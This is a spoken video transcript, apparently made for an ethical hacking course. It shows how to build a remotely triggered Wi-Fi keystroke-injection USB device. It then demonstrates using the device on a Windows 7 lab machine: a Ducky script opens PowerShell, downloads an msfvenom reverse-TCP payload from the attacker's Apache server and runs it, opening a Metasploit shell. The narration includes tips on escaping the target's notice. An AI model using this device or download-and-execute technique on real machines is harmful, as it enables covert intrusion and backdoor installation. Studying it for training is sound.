Hey everyone, this is my 300th take. Making videos is hard. Anyway, first things first, disclaimer, this video is for educational purposes only. Please do not build this device and start sticking it into your, local bank's computer. Really, just be smart about this, please. On top of that, this video is required for my EEL 4789 ethical hacking course. My name is Sean, and today we're going to be looking at building our very own Fi Ducky. Basically, this is a Fi Ducky. At its core, it's literally just a rubber ducky. Props to Hack5, the company who originally designed and built that device. At its core, a rubber ducky is just an HID injection device. You can plug this bad boy in, or those bad boys in, to any computer and just execute scripts. It'll rapidly type in keystrokes and get you access to a PowerShell and download a backdoor, or change a wallpaper, or change a administrator's password for fun. You get the idea. But at the end of the day, it's missing just that little bit of extra fun that I hope we've added here. So basically, the Fi rubber ducky is a rubber duck with an ESP8266 module attached to it. What this will allow us to do is pop this sucker into a back of a computer, walk away from your target, turn on your phone, connect to its access point, and just start running scripts left and right. It's a pretty cool design in theory. Basically, you don't have to get back up to your target's computer to change your scripts. You don't have to look suspicious as you keep hovering over your target's computer waiting for them to slowly turn their back before you execute a script. Plug the device in. But with this thing, we just put this in, we can sit far away, watch our targets on their computer, and the moment they turn their head, go ahead and click that button and start your script. So with that out of the way, let's go ahead and take a look at how to build one of these things. Now, before we begin this tutorial, I just want to throw this out there. This project is not for the faint of heart. You're going to need some basic soldering skills, along with some common sense, a credit card, and something that every engineer needs, basically the nervous mentality that you're going to break the entire device before you finish it. So, let's get started. As you can see here, we've removed our Fi Ducky from its outer casing. We have the Arduino Pro Micro, an ESP8266 module attached, and of course our voltage regulator, along with our micro USB adapter. The regulator is actually pretty important. Do not forget that. Don't think you can do this without this. If you attach the ESP8266 directly to the Arduino Pro Micro, you will burn it out. Basically, this puppy needs 5 volts, this puppy only gives 3.3 volts. You need that, otherwise that will die. Alright everyone, so after traveling back in the past, coming back in the future, and laying all these parts out here for you, let's go and take a closer look to see what we need to go ahead and build our Fi Ducky. We'll need our Arduino Pro Micro, along with our ESP8266 Wi-Fi module chip, and our voltage regulator. If you can, go ahead and spring for a micro USB adapter. Makes it pretty easy when plugging it into a target's computer. On top of that, you need some thin gauge solder wire, and I used 22 gauge electrical wire as well for this project. And of course, you'll need your soldering iron as well. On top of that, some nice extras to have on hand are some heat shrink tubing and a heat gun. If you don't have a heat gun, you can always use a lighter, works just as well. So now we can see the wiring diagram. You'll want to go ahead and connect the Arduino, the ESP, and voltage regulator as shown. You'll need to make 2 special split wires for this case. The first wire, as shown in light beige, has 2 splits that stem from the Arduino ground pin to the regulator ground pin, and finally to the ESP chip. When this wire reaches the ESP chip, you'll need a triple split that'll connect the ground, GPIO 15, and GPIO 0 pins. You'll want to make sure to solder this split in a way where you can later cut or desolder the GPIO 0 pin. This is important as the GPIO 0 pin is only needed to flash the ESP module. The second wire, shown as brown, will split from the out pin on the regulator to the ESP, VCC, and EN pins. Once we're finished with this, we'll want to go ahead and connect the TX pin from the ESP to the Arduino's RX pin, and vice versa, the RX pin from the Arduino to the TX pin on the ESP chip.
1 hour later.
Now that everything is wired up and in its proper place, the next thing we're going to do is flash our ESP module. First thing you'll need to do is head on over to SpaceHun's GitHub page and navigate to this link below. This Arduino script allows us to flash our ESP module through the Arduino, sending every byte that the Arduino receives directly to the ESP chip. Copy this script and paste it into your Arduino IDE. Verify and upload the script. From here, you'll want to head back to the GitHub page and download the bin file which hosts the web application for our Fi Ducky. Now, for the ESP module I'm using, I'm going to select the 4 megabyte bin file. You can select the 1 megabyte bin file or the 512K bin file. It really just depends on how much memory your ESP module has. Once this is finished, we'll need to download Node MCU Flasher, which is a firmware programmer that allows us to download the bin file directly to the ESP. Open Node, head on over to the Advanced tab, and make sure your settings are exactly as shown on screen. The baud rate, the flash size, and the flash speed, the SPI mode are all set exactly. Head on over to the Config tab, click the cog, and locate your bin file which you just downloaded. From there, go ahead and click the Operation tab and select Flash. Once this is finished, head back over to the GitHub page one last time and click the Arduino Fi Duck at the top of the page. Select the INO file and copy the Arduino script as shown. Paste this script into your Arduino IDE once more, verify, and upload this script. Next up is taking care of the GPIO pin, which we'll need to sever, as when this pin is pulling low, it puts the ESP module into firmware mode. We want to make sure that this is off so we can use the web application we've just uploaded to the ESP. So now that we're finished, go ahead and unplug your Fi Ducky. As shown on screen, I've uploaded the wiring diagram for the pin we need to go ahead and cut. I kind of took the lazy engineering way out of here on this one. I just used a nail clipper and snipped the connection at the base of the GPIO 0 pin. Once the connection have been severed, we're ready for action. I've went ahead and I've plugged in the Fi Ducky after everything has been put together, and I've went ahead and I connected to the access point as well, as shown here. Connected to Fi Duck. Keep in mind the default password is quack quack, one word. When you're connecting, please make sure you change that as soon as possible. So now that we're connected, let's go ahead and access the application. It's at 192.168.4.1. And here we can go ahead and see the main tab, the scripts tab. I already have one Ducky script loaded, which we'll go ahead and talk about in just a second. We have options to format the memory within the ESP module. You can also upload a new script if you've built one on your computer. The next tab over is the Live Execute tab, which we can create Ducky scripts on the fly and go ahead and run them remotely. And then we also have our Settings tab, which allows us to create the SSID name along with the password. I'm going to change this again. Actually, we're gonna blare this out of the video, so there's a bar here now. Anyway, we can set the channel. We can also make it hidden as well in case we don't want to broadcast the SSID, alerting others that there's another Wi-Fi network up. And we can also set the option to enable script execution on startup. Basically, when we plug this in, it'll make it act like a regular rubber ducky. It won't need to wait for a remote start. it'll automatically just run your first script. Alright, so before we plug our Fi Ducky into our Windows 7 terminal, let's go ahead and create an exploit through Kali, start our Apache server, and take it from there. So first things first, we need to go ahead and find our IP address. So let's go ahead and type in ifconfig, and here we have our local IP address. And let's go ahead and start our Apache server, where we will store our payload for our Windows 7 machine to download. Let's just go ahead and make sure that's up and running. We're all good, we're active. So when the Windows 7 machine pings the Apache server, it should be able to find it. So let's go ahead and head on over to our Metasploit framework and create our exploit. So first we'll want to go ahead and look for that directory. And from here on out, we'll go ahead and use msf venom -p windows interpreter reverse tcp f, and what this will do is it'll force the payload to be saved as a VBS file, which will execute within the PowerShell. From there on out, we'll want to go ahead and set our lhost equal to, and that's our IP address that we originally found before, so 192.168.1.120, and we want to set our L port to 444. We'll want to save it to the Apache server, so we'll just do -o /var www/ too many W's, www, nope, HTML, and we'll save it as payload text. Alright, so we're done here. Let's go ahead and open our Metasploit session console. Open that up fully, and we'll want to use multi/handler. We want to set our payload as Windows interpreter reverse TCP. Oops, did we spell something wrong? Yes, we did. Let's go ahead and set our lhost to, again, our IP address. What? Oh, because we need the word set. Set is helpful. Let's go ahead and set our L port 444. And let's go ahead and start our listener exploit. So now that we have that set up and listening, we'll navigate over to our Windows 7 machine. We'll take our Fi Ducky, and we're going to pretend that this is a random machine and it's a random USB port on the Windows 7 machine, and we'll go ahead and plug this into the machine. Walk away. Now, you need to access the Fi Ducky in order to enable the script, or again, you can use start on power if you want. But for me, I'm just going to go ahead and open up my laptop over here. And we're going to, again, make sure we are connected. And we're still not connected. technical difficulty, folks. It happens. Computers are not magic. All right. So we have a very, very, very simple Ducky script I've set up here for us. I had something a little bit more complicated earlier. Wasn't working out in my favor. Just decided to simplify it down, make life easy. The Windows 7 machine is not heavily secured by any means. And again, this is just a very simple demo on how to use your Wi-Fi Ducky. So as you can see here, we have GUIR, which will launch the run prompt on the Windows 7. From there on out, we're going to go ahead and open up a PowerShell, and we're going to download a new object from a web client, and we set the download file location, and the saved name for that file, and then we'll go ahead and start the file itself. So let's just quickly click the run button, and we're going to close this down, and we're going to show you what's going to happen here on the Windows 7 machine. So as you can see here, very easy to use. I've already connected to the Windows 7 machine through my Kali machine. I already have an interpreter session open. Let's go ahead and just type in options, help, and then we can kind of go ahead and see everything that's going on here, all of our options, and there you have it. I'm not going to get into too much on how to use the interpreter shell once we've spawned a session. I'll leave that to you. And again, this is our Wi-Fi Ducky.